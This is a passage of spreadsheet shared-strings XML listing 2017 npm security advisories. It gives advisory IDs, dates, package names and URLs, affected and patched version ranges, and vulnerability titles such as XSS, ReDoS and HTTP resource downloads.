    <t>/advisories/506</t>
  </si>
  <si>
    <t>2017-08-08T22:53:11.328+00:00</t>
  </si>
  <si>
    <t>node-opencv</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-opencv</t>
  </si>
  <si>
    <t>/advisories/505</t>
  </si>
  <si>
    <t>2017-08-08T22:52:35.733+00:00</t>
  </si>
  <si>
    <t>opencv.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/opencv.js</t>
  </si>
  <si>
    <t>/advisories/504</t>
  </si>
  <si>
    <t>2017-08-08T22:51:59.119+00:00</t>
  </si>
  <si>
    <t>openssl.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/openssl.js</t>
  </si>
  <si>
    <t>/advisories/503</t>
  </si>
  <si>
    <t>2017-08-08T22:49:10.194+00:00</t>
  </si>
  <si>
    <t>node-openssl</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-openssl</t>
  </si>
  <si>
    <t>/advisories/502</t>
  </si>
  <si>
    <t>2017-08-08T22:27:39.78+00:00</t>
  </si>
  <si>
    <t>node-opensl</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-opensl</t>
  </si>
  <si>
    <t>/advisories/501</t>
  </si>
  <si>
    <t>2017-08-08T22:24:52.353+00:00</t>
  </si>
  <si>
    <t>node-tkinter</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-tkinter</t>
  </si>
  <si>
    <t>/advisories/500</t>
  </si>
  <si>
    <t>2017-08-08T22:21:25.25+00:00</t>
  </si>
  <si>
    <t>tkinter</t>
  </si>
  <si>
    <t>https://www.npmjs.com/tkinter</t>
  </si>
  <si>
    <t>/advisories/499</t>
  </si>
  <si>
    <t>2017-08-08T22:20:00.217+00:00</t>
  </si>
  <si>
    <t>babelcli</t>
  </si>
  <si>
    <t>https://www.npmjs.com/babelcli</t>
  </si>
  <si>
    <t>/advisories/480</t>
  </si>
  <si>
    <t>2017-08-08T22:16:08.402+00:00</t>
  </si>
  <si>
    <t>mssql-node</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mssql-node</t>
  </si>
  <si>
    <t>/advisories/498</t>
  </si>
  <si>
    <t>2017-08-08T22:07:12.633+00:00</t>
  </si>
  <si>
    <t>gruntcli</t>
  </si>
  <si>
    <t>https://www.npmjs.com/gruntcli</t>
  </si>
  <si>
    <t>/advisories/484</t>
  </si>
  <si>
    <t>2017-08-08T22:00:15.994+00:00</t>
  </si>
  <si>
    <t>nodemssql</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodemssql</t>
  </si>
  <si>
    <t>/advisories/485</t>
  </si>
  <si>
    <t>2017-08-08T22:00:05.996+00:00</t>
  </si>
  <si>
    <t>mssql.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mssql.js</t>
  </si>
  <si>
    <t>/advisories/486</t>
  </si>
  <si>
    <t>2017-08-08T21:59:51.735+00:00</t>
  </si>
  <si>
    <t>sqlserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sqlserver</t>
  </si>
  <si>
    <t>/advisories/488</t>
  </si>
  <si>
    <t>2017-08-08T21:59:42.14+00:00</t>
  </si>
  <si>
    <t>nodefabric</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodefabric</t>
  </si>
  <si>
    <t>/advisories/487</t>
  </si>
  <si>
    <t>2017-08-08T21:59:33.042+00:00</t>
  </si>
  <si>
    <t>fabric-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fabric-js</t>
  </si>
  <si>
    <t>/advisories/489</t>
  </si>
  <si>
    <t>2017-08-08T21:59:22.31+00:00</t>
  </si>
  <si>
    <t>node-fabric</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-fabric</t>
  </si>
  <si>
    <t>/advisories/490</t>
  </si>
  <si>
    <t>2017-08-08T21:59:12.407+00:00</t>
  </si>
  <si>
    <t>sqliter</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sqliter</t>
  </si>
  <si>
    <t>/advisories/491</t>
  </si>
  <si>
    <t>2017-08-08T21:59:03.75+00:00</t>
  </si>
  <si>
    <t>sqlite.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sqlite.js</t>
  </si>
  <si>
    <t>/advisories/492</t>
  </si>
  <si>
    <t>2017-08-08T21:58:52.988+00:00</t>
  </si>
  <si>
    <t>nodesqlite</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodesqlite</t>
  </si>
  <si>
    <t>/advisories/493</t>
  </si>
  <si>
    <t>2017-08-08T21:58:41.991+00:00</t>
  </si>
  <si>
    <t>node-sqlite</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-sqlite</t>
  </si>
  <si>
    <t>/advisories/494</t>
  </si>
  <si>
    <t>2017-08-08T21:58:27.577+00:00</t>
  </si>
  <si>
    <t>mysqljs</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mysqljs</t>
  </si>
  <si>
    <t>/advisories/495</t>
  </si>
  <si>
    <t>2017-08-08T21:58:17.086+00:00</t>
  </si>
  <si>
    <t>mariadb</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mariadb</t>
  </si>
  <si>
    <t>/advisories/496</t>
  </si>
  <si>
    <t>2017-08-08T21:58:08.012+00:00</t>
  </si>
  <si>
    <t>jquery.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jquery.js</t>
  </si>
  <si>
    <t>/advisories/497</t>
  </si>
  <si>
    <t>2017-08-08T21:57:55.089+00:00</t>
  </si>
  <si>
    <t>d3.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/d3.js</t>
  </si>
  <si>
    <t>HTML Injection</t>
  </si>
  <si>
    <t>/advisories/322</t>
  </si>
  <si>
    <t>2017-07-05T21:47:28.68+00:00</t>
  </si>
  <si>
    <t>shout</t>
  </si>
  <si>
    <t>https://www.npmjs.com/shout</t>
  </si>
  <si>
    <t>&gt;=0.44.0 &lt;=0.49.3</t>
  </si>
  <si>
    <t>&gt;=0.50.0</t>
  </si>
  <si>
    <t>/advisories/146</t>
  </si>
  <si>
    <t>2017-07-05T21:44:18.141+00:00</t>
  </si>
  <si>
    <t>growl</t>
  </si>
  <si>
    <t>https://www.npmjs.com/growl</t>
  </si>
  <si>
    <t>&lt;1.10.2</t>
  </si>
  <si>
    <t>&gt;=1.10.2</t>
  </si>
  <si>
    <t>Downloads Resources over HTTP</t>
  </si>
  <si>
    <t>/advisories/249</t>
  </si>
  <si>
    <t>2017-07-05T21:41:01.426+00:00</t>
  </si>
  <si>
    <t>ikst</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ikst</t>
  </si>
  <si>
    <t>&lt;1.1.2</t>
  </si>
  <si>
    <t>&gt;=1.1.2</t>
  </si>
  <si>
    <t>/advisories/291</t>
  </si>
  <si>
    <t>2017-07-05T21:40:42.794+00:00</t>
  </si>
  <si>
    <t>gfe-sass</t>
  </si>
  <si>
    <t>https://www.npmjs.com/gfe-sass</t>
  </si>
  <si>
    <t>/advisories/384</t>
  </si>
  <si>
    <t>2017-07-05T21:24:10.302+00:00</t>
  </si>
  <si>
    <t>hftp</t>
  </si>
  <si>
    <t>https://www.npmjs.com/hftp</t>
  </si>
  <si>
    <t>/advisories/346</t>
  </si>
  <si>
    <t>2017-06-27T20:03:55.193+00:00</t>
  </si>
  <si>
    <t>f2e-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/f2e-server</t>
  </si>
  <si>
    <t>&lt;= 1.12.11</t>
  </si>
  <si>
    <t>&gt;=1.12.12</t>
  </si>
  <si>
    <t>/advisories/350</t>
  </si>
  <si>
    <t>2017-06-05T13:02:16.496+00:00</t>
  </si>
  <si>
    <t>gomeplus-h5-proxy</t>
  </si>
  <si>
    <t>https://www.npmjs.com/gomeplus-h5-proxy</t>
  </si>
  <si>
    <t>/advisories/349</t>
  </si>
  <si>
    <t>2017-06-05T13:01:57.07+00:00</t>
  </si>
  <si>
    <t>badjs-sourcemap-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/badjs-sourcemap-server</t>
  </si>
  <si>
    <t>Downloads resources over HTTP</t>
  </si>
  <si>
    <t>/advisories/334</t>
  </si>
  <si>
    <t>2017-06-05T12:37:07.359+00:00</t>
  </si>
  <si>
    <t>hubl-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/hubl-server</t>
  </si>
  <si>
    <t>/advisories/356</t>
  </si>
  <si>
    <t>2017-06-05T12:29:13.017+00:00</t>
  </si>
  <si>
    <t>pidusage</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pidusage</t>
  </si>
  <si>
    <t>&lt;=1.1.4</t>
  </si>
  <si>
    <t>&gt;=1.1.5</t>
  </si>
  <si>
    <t>Command Execution</t>
  </si>
  <si>
    <t>/advisories/336</t>
  </si>
  <si>
    <t>2017-05-19T15:05:56.203+00:00</t>
  </si>
  <si>
    <t>windows-cpu</t>
  </si>
  <si>
    <t>https://www.npmjs.com/windows-cpu</t>
  </si>
  <si>
    <t>&lt;=0.0.0</t>
  </si>
  <si>
    <t>ReDoS</t>
  </si>
  <si>
    <t>/advisories/338</t>
  </si>
  <si>
    <t>2017-04-25T18:17:23.074+00:00</t>
  </si>
  <si>
    <t>brace-expansion</t>
  </si>
  <si>
    <t>https://www.npmjs.com/brace-expansion</t>
  </si>
  <si>
    <t>&lt;=1.1.6</t>
  </si>
  <si>
    <t>&gt;=1.1.7</t>
  </si>
  <si>
    <t>Insecure randomness</t>
  </si>
  <si>
    <t>/advisories/321</t>
  </si>
  <si>
    <t>2017-04-14T22:49:45.953+00:00</t>
  </si>
  <si>
    <t>socket.io</t>
  </si>
  <si>
    <t>https://www.npmjs.com/socket.io</t>
  </si>
  <si>
    <t>&lt;=0.9.6</t>
  </si>
  <si>
    <t>&gt;=0.9.7</t>
  </si>
  <si>
    <t>/advisories/312</t>
  </si>
  <si>
    <t>2017-04-14T22:45:42.742+00:00</t>
  </si>
  <si>
    <t>useragent</t>
  </si>
  <si>
    <t>https://www.npmjs.com/useragent</t>
  </si>
  <si>
    <t>&lt;=2.1.12</t>
  </si>
  <si>
    <t>&gt;=2.1.13</t>
  </si>
  <si>
    <t>/advisories/303</t>
  </si>
  <si>
    <t>2017-04-14T22:44:30.535+00:00</t>
  </si>
  <si>
    <t>hostr</t>
  </si>
  <si>
    <t>https://www.npmjs.com/hostr</t>
  </si>
  <si>
    <t>&lt;=2.3.5</t>
  </si>
  <si>
    <t>&gt;=2.3.6</t>
  </si>
  <si>
    <t>Cryptographically Weak PRNG</t>
  </si>
  <si>
    <t>/advisories/157</t>
  </si>
  <si>
    <t>2017-04-14T22:07:15.405+00:00</t>
  </si>
  <si>
    <t>randomatic</t>
  </si>
  <si>
    <t>https://www.npmjs.com/randomatic</t>
  </si>
  <si>
    <t>Exceeding Stack Call Limit DoS</t>
  </si>
  <si>
    <t>/advisories/330</t>
  </si>
  <si>
    <t>2017-04-14T22:04:14.245+00:00</t>
  </si>
  <si>
    <t>jquery</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jquery</t>
  </si>
  <si>
    <t>&gt;=2.10 &lt;=2.2.4</t>
  </si>
  <si>
    <t>/advisories/309</t>
  </si>
  <si>
    <t>2017-04-14T21:44:24.494+00:00</t>
  </si>
  <si>
    <t>request</t>
  </si>
  <si>
    <t>https://www.npmjs.com/request</t>
  </si>
  <si>
    <t>&gt;=2.2.6 &lt;2.47.0 || &gt;2.51.0 &lt;=2.67.0</t>
  </si>
  <si>
    <t>&gt;=2.68.0</t>
  </si>
  <si>
    <t>/advisories/331</t>
  </si>
  <si>
    <t>2017-04-14T21:06:38.005+00:00</t>
  </si>
  <si>
    <t>nes</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nes</t>
  </si>
  <si>
    <t>&lt;=6.4.0</t>
  </si>
  <si>
    <t>&gt;=6.4.1</t>
  </si>
  <si>
    <t>Tmp files readable by other users</t>
  </si>
  <si>
    <t>/advisories/310</t>
  </si>
  <si>
    <t>2017-04-14T21:03:34.186+00:00</t>
  </si>
  <si>
    <t>sync-exec</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sync-exec</t>
  </si>
  <si>
    <t>/advisories/308</t>
  </si>
  <si>
    <t>2017-04-14T20:58:05.019+00:00</t>
  </si>
  <si>
    <t>decamelize</t>
  </si>
  <si>
    <t>https://www.npmjs.com/decamelize</t>
  </si>
  <si>
    <t>&gt;=1.1.0 &lt;=1.1.1</t>
  </si>
  <si>
    <t>XSS in Hover Over Label Names</t>
  </si>
  <si>
    <t>/advisories/307</t>
  </si>
  <si>
    <t>2017-04-14T20:56:20.146+00:00</t>
  </si>
  <si>
    <t>morris.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/morris.js</t>
  </si>
  <si>
    <t>Regular Expression Denial Of Service</t>
  </si>
  <si>
    <t>/advisories/100</t>
  </si>
  <si>
    <t>2017-04-14T18:44:23.702+00:00</t>
  </si>
  <si>
    <t>uri-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/uri-js</t>
  </si>
  <si>
    <t>Unsafe eval()</t>
  </si>
  <si>
    <t>/advisories/315</t>
  </si>
  <si>
    <t>2017-04-14T18:35:13.449+00:00</t>
  </si>
  <si>
    <t>summit</t>
  </si>
  <si>
    <t>https://www.npmjs.com/summit</t>
  </si>
  <si>
    <t>&gt;=0.1.0</t>
  </si>
  <si>
    <t>Cross Site Scripting</t>
  </si>
  <si>
    <t>/advisories/159</t>
  </si>
  <si>
    <t>2017-04-14T18:31:32.771+00:00</t>
  </si>
  <si>
    <t>gitbook</t>
  </si>
  <si>
    <t>https://www.npmjs.com/gitbook</t>
  </si>
  <si>
    <t>&lt;3.2.2</t>
  </si>
  <si>
    <t>Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>/advisories/314</t>
  </si>
  <si>
    <t>2017-04-14T17:36:14.479+00:00</t>
  </si>
  <si>
    <t>restify</t>
  </si>
  <si>
    <t>https://www.npmjs.com/restify</t>
  </si>
  <si>
    <t>&gt;=2.0.0 &lt;=4.0.4</t>
  </si>
  <si>
    <t>&gt;=4.1.0</t>
  </si>
  <si>
    <t>/advisories/155</t>
  </si>
  <si>
    <t>2017-04-14T17:20:02.755+00:00</t>
  </si>
  <si>
    <t>sanitize-html</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sanitize-html</t>
  </si>
  <si>
    <t>&lt;=1.2.2</t>
  </si>
  <si>
    <t>&gt;=1.2.3</t>
  </si>
  <si>
    <t>/advisories/154</t>
  </si>
  <si>
    <t>2017-04-11T23:49:58.283+00:00</t>
  </si>
  <si>
    <t>&lt;=1.11.1</t>
  </si>
  <si>
    <t>&gt;=1.11.4</t>
  </si>
  <si>
    <t>/advisories/153</t>
  </si>
  <si>
    <t>2017-04-11T23:30:26.191+00:00</t>
  </si>
  <si>
    <t>Lack of HTML Escaping</t>
  </si>
  <si>
    <t>/advisories/158</t>
  </si>
  <si>
    <t>2017-04-11T23:25:46.449+00:00</t>
  </si>
  <si>
    <t>forms</t>
  </si>
  <si>
    <t>https://www.npmjs.com/forms</t>
  </si>
  <si>
    <t>&lt;1.3.0</t>
  </si>
  <si>
    <t>&gt;=1.3.0</t>
  </si>
  <si>
    <t>Insufficient Error Handling</t>
  </si>
  <si>
    <t>/advisories/323</t>
  </si>
  <si>
    <t>2017-04-11T23:25:24.169+00:00</t>
  </si>
  <si>
    <t>http-proxy</t>
  </si>
  <si>
    <t>https://www.npmjs.com/http-proxy</t>
  </si>
  <si>
    <t>&lt;=0.6.6</t>
  </si>
  <si>
    <t>&gt;=0.7.0</t>
  </si>
  <si>
    <t>Denial of Service via malformed accept-encoding header</t>
  </si>
  <si>
    <t>/advisories/335</t>
  </si>
  <si>
    <t>2017-04-05T18:16:00+00:00</t>
  </si>
  <si>
    <t>hapi</t>
  </si>
  <si>
    <t>https://www.npmjs.com/hapi</t>
  </si>
  <si>
    <t>&gt;= 15.0.0 &lt;= 16.1.0</t>
  </si>
  <si>
    <t>&gt;= 16.1.1</t>
  </si>
  <si>
    <t>XSS via .swf files</t>
  </si>
  <si>
    <t>/advisories/332</t>
  </si>
  <si>
    <t>2017-03-24T18:44:45+00:00</t>
  </si>
  <si>
    <t>yui</t>
  </si>
  <si>
    <t>https://www.npmjs.com/yui</t>
  </si>
  <si>
    <t>&gt;=3.0.0 &lt;=3.9.1 =3.10.2</t>
  </si>
  <si>
    <t>=3.10.1 &gt;=3.10.3</t>
  </si>
  <si>
    <t>Predictable temp filenames allow overwrite of arbitrary files</t>
  </si>
  <si>
    <t>/advisories/152</t>
  </si>
  <si>
    <t>2017-03-23T17:37:50+00:00</t>
  </si>
  <si>
    <t>npm</t>
  </si>
  <si>
    <t>https://www.npmjs.com/npm</t>
  </si>
  <si>
    <t>&lt;1.3.3</t>
  </si>
  <si>
    <t>&gt;=1.3.3</t>
  </si>
  <si>
    <t>/advisories/328</t>
  </si>
  <si>
    <t>2017-03-21T18:23:53+00:00</t>
  </si>
  <si>
    <t>&gt;=1.4.0 &lt;=1.11.3 || &gt;=1.12.4 &lt;=2.2.4</t>
  </si>
  <si>
    <t>XSS via improper selector detection</t>
  </si>
  <si>
    <t>/advisories/329</t>
  </si>
  <si>
    <t>2017-03-21T18:23:43+00:00</t>
  </si>
  <si>
    <t>&gt;=1.7.1 &lt;=1.8.3</t>
  </si>
  <si>
    <t>&gt;=1.9.0</t>
  </si>
  <si>
    <t>/advisories/326</t>
  </si>
  <si>
    <t>2017-03-15T20:30:13+00:00</t>
  </si>
  <si>
    <t>i18next</t>
  </si>
  <si>
    <t>https://www.npmjs.com/i18next</t>
  </si>
  <si>
    <t>&gt;=2.0.0 &lt;=3.4.3</t>
  </si>
  <si>
    <t>&gt;=3.4.4</t>
  </si>
  <si>
    <t>XSS via Angular Expression</t>
  </si>
  <si>
    <t>/advisories/327</t>
  </si>
  <si>
    <t>2017-03-15T18:51:07+00:00</t>
  </si>
  <si>
    <t>ag-grid</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ag-grid</t>
  </si>
  <si>
    <t>&lt;0.0.0</t>
  </si>
  <si>
    <t>&gt;0.0.0</t>
  </si>
  <si>
    <t>/advisories/325</t>
  </si>
  <si>
    <t>2017-03-14T21:43:55+00:00</t>
  </si>
  <si>
    <t>&lt;=1.10.2</t>
  </si>
  <si>
    <t>&gt;=1.10.3</t>
  </si>
  <si>
    <t>Invalid Curve Attack</t>
  </si>
  <si>
    <t>/advisories/324</t>
  </si>
  <si>
    <t>2017-03-13T19:22:12+00:00</t>
  </si>
  <si>
    <t>node-jose</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-jose</t>
  </si>
  <si>
    <t>&lt;0.9.3</t>
  </si>
  <si>
    <t>&gt;=0.9.3</t>
  </si>
  <si>
    <t>XSS in Data URI</t>
  </si>
  <si>
    <t>/advisories/319</t>
  </si>
  <si>
    <t>2017-03-09T18:12:00+00:00</t>
  </si>
  <si>
    <t>remarkable</t>
  </si>
  <si>
    <t>https://www.npmjs.com/remarkable</t>
  </si>
  <si>
    <t>&lt;=1.6.2</t>
  </si>
  <si>
    <t>&gt;=1.7.0</t>
  </si>
  <si>
    <t>Header Forgery</t>
  </si>
  <si>
    <t>/advisories/318</t>
  </si>
  <si>
    <t>2017-03-08T22:06:05+00:00</t>
  </si>
  <si>
    <t>http-signature</t>
  </si>
  <si>
    <t>https://www.npmjs.com/http-signature</t>
  </si>
  <si>
    <t>&lt;=0.9.11</t>
  </si>
  <si>
    <t>&gt;=0.10.0</t>
  </si>
  <si>
    <t>Code Execution Through IIFE</t>
  </si>
  <si>
    <t>/advisories/313</t>
  </si>
  <si>
    <t>2017-02-10T19:01:20+00:00</t>
  </si>
  <si>
    <t>serialize-to-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serialize-to-js</t>
  </si>
  <si>
    <t>&gt;=1.0.0</t>
  </si>
  <si>
    <t>Code Execution through IIFE</t>
  </si>
  <si>
    <t>/advisories/311</t>
  </si>
  <si>
    <t>2017-02-09T16:38:36+00:00</t>
  </si>
  <si>
    <t>node-serialize</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-serialize</t>
  </si>
  <si>
    <t>Arbitrary File Read</t>
  </si>
  <si>
    <t>/advisories/305</t>
  </si>
  <si>
    <t>2017-01-23T16:45:16+00:00</t>
  </si>
  <si>
    <t>fury-adapter-swagger</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fury-adapter-swagger</t>
  </si>
  <si>
    <t>&gt;= 0.2.0 &lt;= 0.9.6 || ~0.8.0-pre</t>
  </si>
  <si>
    <t>&gt; 0.9.6</t>
  </si>
  <si>
    <t>/advisories/304</t>
  </si>
  <si>
    <t>2017-01-06T16:50:17+00:00</t>
  </si>
  <si>
    <t>windows-build-tools</t>
  </si>
  <si>
    <t>https://www.npmjs.com/windows-build-tools</t>
  </si>
  <si>
    <t>/advisories/301</t>
  </si>
  <si>
    <t>2017-01-01T04:33:32+00:00</t>
  </si>
  <si>
    <t>mystem-fix</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mystem-fix</t>
  </si>
  <si>
    <t>/advisories/302</t>
  </si>
  <si>
    <t>2017-01-01T04:32:48+00:00</t>
  </si>
  <si>
    <t>react-native-baidu-voice-synthesizer</t>
  </si>
  <si>
    <t>https://www.npmjs.com/react-native-baidu-voice-synthesizer</t>
  </si>
  <si>
    <t>/advisories/295</t>
  </si>
  <si>
    <t>2017-01-01T04:32:34+00:00</t>
  </si>
  <si>
    <t>windows-latestchromedriver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/windows-latestchromedriver</t>
  </si>
  <si>
    <t>/advisories/297</t>
  </si>
  <si>
    <t>2017-01-01T04:32:09+00:00</t>
  </si>
  <si>
    <t>npm-test-sqlite3-trunk</t>
  </si>
  <si>
    <t>https://www.npmjs.com/npm-test-sqlite3-trunk</t>
  </si>
  <si>
    <t>/advisories/172</t>
  </si>
  <si>
    <t>2017-01-01T04:31:50+00:00</t>
  </si>
  <si>
    <t>alto-saxophone</t>
  </si>
  <si>
    <t>https://www.npmjs.com/alto-saxophone</t>
  </si>
  <si>
    <t>&lt;2.25.1</t>
  </si>
  <si>
    <t>&gt;=2.25.1</t>
  </si>
  <si>
    <t>/advisories/299</t>
  </si>
  <si>
    <t>2017-01-01T04:30:52+00:00</t>
  </si>
  <si>
    <t>pm2-kafka</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pm2-kafka</t>
  </si>
  <si>
    <t>/advisories/300</t>
  </si>
  <si>
    <t>2017-01-01T04:30:46+00:00</t>
  </si>
  <si>
    <t>haxeshim</t>
  </si>
  <si>
    <t>https://www.npmjs.com/haxeshim</t>
  </si>
  <si>
    <t>/advisories/296</t>
  </si>
  <si>
    <t>2017-01-01T04:30:42+00:00</t>
  </si>
  <si>
    <t>windows-seleniumjar</t>
  </si>
  <si>
    <t>https://www.npmjs.com/windows-seleniumjar</t>
  </si>
  <si>
    <t>/advisories/298</t>
  </si>
  <si>
    <t>2017-01-01T04:30:36+00:00</t>
  </si>
  <si>
    <t>openframe-ascii-image</t>
  </si>
  <si>
    <t>https://www.npmjs.com/openframe-ascii-image</t>
  </si>
  <si>
    <t>/advisories/293</t>
  </si>
  <si>
    <t>2017-01-01T04:29:03+00:00</t>
  </si>
  <si>
    <t>windows-iedriver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/windows-iedriver</t>
  </si>
  <si>
    <t>/advisories/294</t>
  </si>
  <si>
    <t>2017-01-01T04:28:58+00:00</t>
  </si>
  <si>
    <t>haxe3</t>
  </si>
  <si>
    <t>https://www.npmjs.com/haxe3</t>
  </si>
  <si>
    <t>/advisories/285</t>
  </si>
  <si>
    <t>2017-01-01T04:28:55+00:00</t>
  </si>
  <si>
    <t>windows-selenium-chromedriver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/windows-selenium-chromedriver</t>
  </si>
  <si>
    <t>/advisories/287</t>
  </si>
  <si>
    <t>2017-01-01T04:28:49+00:00</t>
  </si>
  <si>
    <t>fis-sass-all</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fis-sass-all</t>
  </si>
  <si>
    <t>/advisories/289</t>
  </si>
  <si>
    <t>2017-01-01T04:28:45+00:00</t>
  </si>
  <si>
    <t>pk-app-wonderbox</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pk-app-wonderbox</t>
  </si>
  <si>
    <t>/advisories/288</t>
  </si>
  <si>
    <t>2017-01-01T04:28:41+00:00</t>
  </si>
  <si>
    <t>healthcenter</t>
  </si>
  <si>
    <t>https://www.npmjs.com/healthcenter</t>
  </si>
  <si>
    <t>/advisories/286</t>
  </si>
  <si>
    <t>2017-01-01T04:28:35+00:00</t>
  </si>
  <si>
    <t>arcanist</t>
  </si>
  <si>
    <t>https://www.npmjs.com/arcanist</t>
  </si>
  <si>
    <t>/advisories/290</t>
  </si>
  <si>
    <t>2017-01-01T04:28:30+00:00</t>
  </si>
  <si>
    <t>massif</t>
  </si>
  <si>
    <t>https://www.npmjs.com/massif</t>
  </si>
  <si>
    <t>/advisories/292</t>
  </si>
  <si>
    <t>2017-01-01T04:28:25+00:00</t>
  </si>
  <si>
    <t>roslib-socketio</t>
  </si>
  <si>
    <t>https://www.npmjs.com/roslib-socketio</t>
  </si>
  <si>
    <t>/advisories/283</t>
  </si>
  <si>
    <t>2017-01-01T04:26:36+00:00</t>
  </si>
  <si>
    <t>adamvr-geoip-lite</t>
  </si>
  <si>
    <t>https://www.npmjs.com/adamvr-geoip-lite</t>
  </si>
  <si>
    <t>/advisories/284</t>
  </si>
  <si>
    <t>2017-01-01T04:26:31+00:00</t>
  </si>
  <si>
    <t>selenium-standalone-painful</t>
  </si>
  <si>
    <t>https://www.npmjs.com/selenium-standalone-painful</t>
  </si>
  <si>
    <t>/advisories/277</t>
  </si>
  <si>
    <t>2017-01-01T04:26:28+00:00</t>
  </si>
  <si>
    <t>serc.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serc.js</t>
  </si>
  <si>
    <t>/advisories/274</t>
  </si>
  <si>
    <t>2017-01-01T04:26:21+00:00</t>
  </si>
  <si>
    <t>google-closure-tools-latest</t>
  </si>
  <si>
    <t>https://www.npmjs.com/google-closure-tools-latest</t>
  </si>
  <si>
    <t>/advisories/273</t>
  </si>
  <si>
    <t>2017-01-01T04:26:16+00:00</t>
  </si>
  <si>
    <t>rs-brightcove</t>
  </si>
  <si>
    <t>https://www.npmjs.com/rs-brightcove</t>
  </si>
  <si>
    <t>/advisories/275</t>
  </si>
  <si>
    <t>2017-01-01T04:26:11+00:00</t>
  </si>
  <si>
    <t>libsbmlsim</t>
  </si>
  <si>
    <t>https://www.npmjs.com/libsbmlsim</t>
  </si>
  <si>
    <t>/advisories/276</t>
  </si>
  <si>
    <t>2017-01-01T04:26:05+00:00</t>
  </si>
  <si>
    <t>limbus-buildgen</t>
  </si>
  <si>
    <t>https://www.npmjs.com/limbus-buildgen</t>
  </si>
  <si>
    <t>/advisories/279</t>
  </si>
  <si>
    <t>2017-01-01T04:25:56+00:00</t>
  </si>
  <si>
    <t>ipip-coffee</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ipip-coffee</t>
  </si>
  <si>
    <t>/advisories/282</t>
  </si>
  <si>
    <t>2017-01-01T04:25:51+00:00</t>
  </si>
  <si>
    <t>cloudpub-redis</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cloudpub-redis</t>
  </si>
  <si>
    <t>/advisories/280</t>
  </si>
  <si>
    <t>2017-01-01T04:25:47+00:00</t>
  </si>
  <si>
    <t>mystem-wrapper</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mystem-wrapper</t>
  </si>
  <si>
    <t>/advisories/281</t>
  </si>
  <si>
    <t>2017-01-01T04:24:49+00:00</t>
  </si>
  <si>
    <t>windows-seleniumjar-mirror</t>
  </si>
  <si>
    <t>https://www.npmjs.com/windows-seleniumjar-mirror</t>
  </si>
  <si>
    <t>/advisories/270</t>
  </si>
  <si>
    <t>2017-01-01T04:24:05+00:00</t>
  </si>
  <si>
    <t>soci</t>
  </si>
  <si>
    <t>https://www.npmjs.com/soci</t>
  </si>
  <si>
    <t>/advisories/272</t>
  </si>
  <si>
    <t>2017-01-01T04:24:00+00:00</t>
  </si>
  <si>
    <t>libsbml</t>
  </si>
  <si>
    <t>https://www.npmjs.com/libsbml</t>
  </si>
  <si>
    <t>/advisories/260</t>
  </si>
  <si>
    <t>2017-01-01T04:23:54+00:00</t>
  </si>
  <si>
    <t>selenium-portal</t>
  </si>
  <si>
    <t>https://www.npmjs.com/selenium-portal</t>
  </si>
  <si>
    <t>/advisories/261</t>
  </si>
  <si>
    <t>2017-01-01T04:23:49+00:00</t>
  </si>
  <si>
    <t>tomita-parser</t>
  </si>
  <si>
    <t>https://www.npmjs.com/tomita-parser</t>
  </si>
  <si>
    <t>/advisories/258</t>
  </si>
  <si>
    <t>2017-01-01T04:23:42+00:00</t>
  </si>
  <si>
    <t>herbivore</t>
  </si>
  <si>
    <t>https://www.npmjs.com/herbivore</t>
  </si>
  <si>
    <t>/advisories/259</t>
  </si>
  <si>
    <t>2017-01-01T04:23:35+00:00</t>
  </si>
  <si>
    <t>mystem</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mystem</t>
  </si>
  <si>
    <t>/advisories/264</t>
  </si>
  <si>
    <t>2017-01-01T04:23:30+00:00</t>
  </si>
  <si>
    <t>wixtoolset</t>
  </si>
  <si>
    <t>https://www.npmjs.com/wixtoolset</t>
  </si>
  <si>
    <t>/advisories/267</t>
  </si>
  <si>
    <t>2017-01-01T04:23:24+00:00</t>
  </si>
  <si>
    <t>tomita</t>
  </si>
  <si>
    <t>https://www.npmjs.com/tomita</t>
  </si>
  <si>
    <t>/advisories/262</t>
  </si>
  <si>
